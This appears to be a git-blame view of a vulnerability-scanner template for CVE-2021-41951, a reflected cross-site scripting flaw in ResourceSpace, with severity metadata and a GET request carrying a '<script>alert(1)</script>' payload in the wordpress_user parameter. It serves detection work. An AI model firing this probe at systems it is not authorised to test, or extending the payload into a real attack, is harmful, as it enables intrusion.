2021-11-30 16:45:32 +00:00
id : CVE-2021-41951
info :
2022-09-09 17:34:37 +00:00
name : Resourcespace - Cross-Site Scripting
2021-11-30 16:45:32 +00:00
author : coldfish
severity : medium
2022-04-22 10:38:41 +00:00
description : ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
2023-09-06 12:09:01 +00:00
remediation : |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2021-11-30 16:45:32 +00:00
reference :
- https://www.horizon3.ai/multiple-vulnerabilities-in-resourcespace/
- https://nvd.nist.gov/vuln/detail/CVE-2021-41951
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-11-30 16:45:32 +00:00
cve-id : CVE-2021-41951
cwe-id : CWE-79
2023-10-16 10:55:14 +00:00
epss-score : 0.7632
2023-10-18 16:26:30 +00:00
epss-percentile : 0.97825
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : montala
product : resourcespace
tags : cve,cve2021,xss,resourcespace
2021-11-30 16:45:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-30 16:45:32 +00:00
- method : GET
path :
- '{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E'
matchers-condition : and
matchers :
- type : word
words :
- "TEST<script>alert(1)</script>"
- type : word
part : header
words :
- "text/html"
- type : status
status :
2022-02-28 14:09:26 +00:00
- 200